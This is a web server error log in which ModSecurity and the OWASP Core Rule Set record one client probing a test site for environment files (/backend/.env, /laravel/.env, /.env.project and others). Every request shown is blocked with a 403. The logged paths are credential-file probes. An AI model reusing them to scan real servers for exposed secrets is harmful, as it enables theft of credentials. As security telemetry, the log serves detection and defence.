[Tue Jan 21 15:16:13.712211 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z4-sLXSo5nIGeA4GeT4bkQAAAAc"]
[Tue Jan 21 15:16:13.712605 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z4-sLXSo5nIGeA4GeT4bkQAAAAc"]
[Tue Jan 21 15:16:13.713115 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z4-sLXSo5nIGeA4GeT4bkQAAAAc"]
[Tue Jan 21 15:16:14.479907 2025] [:error] [pid 621468] [client 193.41.206.36:51978] [client 193.41.206.36] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.docker/.env"] [unique_id "Z4-sLnWu2t9ReOwcqmDbKQAAAAs"]
[Tue Jan 21 15:16:14.480161 2025] [:error] [pid 621468] [client 193.41.206.36:51978] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.docker/.env"] [unique_id "Z4-sLnWu2t9ReOwcqmDbKQAAAAs"]
[Tue Jan 21 15:16:14.480396 2025] [:error] [pid 621468] [client 193.41.206.36:51978] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.docker/.env"] [unique_id "Z4-sLnWu2t9ReOwcqmDbKQAAAAs"]
[Tue Jan 21 15:16:16.444813 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z4-sMHSo5nIGeA4GeT4bkgAAAAc"]
[Tue Jan 21 15:16:16.445054 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z4-sMHSo5nIGeA4GeT4bkgAAAAc"]
[Tue Jan 21 15:16:16.445311 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z4-sMHSo5nIGeA4GeT4bkgAAAAc"]
[Tue Jan 21 15:16:16.971438 2025] [authz_core:error] [pid 621468] [client 193.41.206.36:51978] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Tue Jan 21 15:16:19.148888 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z4-sM3So5nIGeA4GeT4bkwAAAAc"]
[Tue Jan 21 15:16:19.150888 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z4-sM3So5nIGeA4GeT4bkwAAAAc"]
[Tue Jan 21 15:16:19.151569 2025] [:error] [pid 610121] [client 193.41.206.36:42872] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z4-sM3So5nIGeA4GeT4bkwAAAAc"]
[Tue Jan 21 15:16:19.469504 2025] [:error] [pid 621468] [client 193.41.206.36:51978] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "Z4-sM3Wu2t9ReOwcqmDbKwAAAAs"]
[Tue Jan 21 15:16:19.469838 2025] [:error] [pid 621468] [client 193.41.206.36:51978] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "Z4-sM3Wu2t9ReOwcqmDbKwAAAAs"]
[Tue Jan 21 15:16:19.470313 2025] [:error] [pid 621468] [client 193.41.206.36:51978] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "Z4-sM3Wu2t9ReOwcqmDbKwAAAAs"]
[Tue Jan 21 15:16:41.959895 2025] [:error] [pid 621467] [client 193.41.206.36:36572] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z4-sSZI8RB7_o08OfB6JAwAAAAk"]
[Tue Jan 21 15:16:41.960288 2025] [:error] [pid 621467] [client 193.41.206.36:36572] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z4-sSZI8RB7_o08OfB6JAwAAAAk"]
[Tue Jan 21 15:16:41.960709 2025] [:error] [pid 621467] [client 193.41.206.36:36572] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z4-sSZI8RB7_o08OfB6JAwAAAAk"]
[Tue Jan 21 15:16:42.352366 2025] [:error] [pid 621517] [client 193.41.206.36:36582] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/shared/.env"] [unique_id "Z4-sSqUWvTqJytu-P8cD5AAAAA0"]
[Tue Jan 21 15:16:42.352762 2025] [:error] [pid 621517] [client 193.41.206.36:36582] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/shared/.env"] [unique_id "Z4-sSqUWvTqJytu-P8cD5AAAAA0"]
[Tue Jan 21 15:16:42.353206 2025] [:error] [pid 621517] [client 193.41.206.36:36582] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/shared/.env"] [unique_id "Z4-sSqUWvTqJytu-P8cD5AAAAA0"]
[Tue Jan 21 15:16:44.743353 2025] [:error] [pid 621467] [client 193.41.206.36:36572] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z4-sTJI8RB7_o08OfB6JBAAAAAk"]
[Tue Jan 21 15:16:44.743743 2025] [:error] [pid 621467] [client 193.41.206.36:36572] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z4-sTJI8RB7_o08OfB6JBAAAAAk"]
[Tue Jan 21 15:16:44.744216 2025] [:error] [pid 621467] [client 193.41.206.36:36572] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z4-sTJI8RB7_o08OfB6JBAAAAAk"]
[Tue Jan 21 15:16:45.074128 2025] [:error] [pid 621517] [client 193.41.206.36:36582] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.project"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.project"] [unique_id "Z4-sTaUWvTqJytu-P8cD5QAAAA0"]
[Tue Jan 21 15:16:45.074590 2025] [:error] [pid 621517] [client 193.41.206.36:36582] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.project"] [unique_id "Z4-sTaUWvTqJytu-P8cD5QAAAA0"]
[Tue Jan 21 15:16:45.075123 2025] [:error] [pid 621517] [client 193.41.206.36:36582] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.project"] [unique_id "Z4-sTaUWvTqJytu-P8cD5QAAAA0"]
[Tue Jan 21 15:16:47.410809 2025] [:error] [pid 621467] [client 193.41.206.36:36572] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z4-sT5I8RB7_o08OfB6JBQAAAAk"]
[Tue Jan 21 15:16:47.412684 2025] [:error] [pid 621467] [client 193.41.206.36:36572] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z4-sT5I8RB7_o08OfB6JBQAAAAk"]
[Tue Jan 21 15:16:47.413051 2025] [:error] [pid 621467] [client 193.41.206.36:36572] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z4-sT5I8RB7_o08OfB6JBQAAAAk"]
[Tue Jan 21 15:16:47.680621 2025] [:error] [pid 621517] [client 193.41.206.36:36582] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "Z4-sT6UWvTqJytu-P8cD5gAAAA0"]
[Tue Jan 21 15:16:47.681010 2025] [:error] [pid 621517] [client 193.41.206.36:36582] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "Z4-sT6UWvTqJytu-P8cD5gAAAA0"]
[Tue Jan 21 15:16:47.681456 2025] [:error] [pid 621517] [client 193.41.206.36:36582] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "Z4-sT6UWvTqJytu-P8cD5gAAAA0"]
[Tue Jan 21 15:16:49.998926 2025] [:error] [pid 621467] [client 193.41.206.36:36572] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/shared/.env"] [unique_id "Z4-sUZI8RB7_o08OfB6JBgAAAAk"]
[Tue Jan 21 15:16:49.999321 2025] [:error] [pid 621467] [client 193.41.206.36:36572] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/shared/.env"] [unique_id "Z4-sUZI8RB7_o08OfB6JBgAAAAk"]
[Tue Jan 21 15:16:49.999843 2025] [:error] [pid 621467] [client 193.41.206.36:36572] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/shared/.env"] [unique_id "Z4-sUZI8RB7_o08OfB6JBgAAAAk"]
[Tue Jan 21 15:16:50.363560 2025] [:error] [pid 621517] [client 193.41.206.36:36582] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "Z4-sUqUWvTqJytu-P8cD5wAAAA0"]
[Tue Jan 21 15:16:50.363951 2025] [:error] [pid 621517] [client 193.41.206.36:36582] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "Z4-sUqUWvTqJytu-P8cD5wAAAA0"]
[Tue Jan 21 15:16:50.364439 2025] [:error] [pid 621517] [client 193.41.206.36:36582] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "Z4-sUqUWvTqJytu-P8cD5wAAAA0"]
[Tue Jan 21 15:16:52.635995 2025] [:error] [pid 621467] [client 193.41.206.36:36572] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.project"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.project"] [unique_id "Z4-sVJI8RB7_o08OfB6JBwAAAAk"]
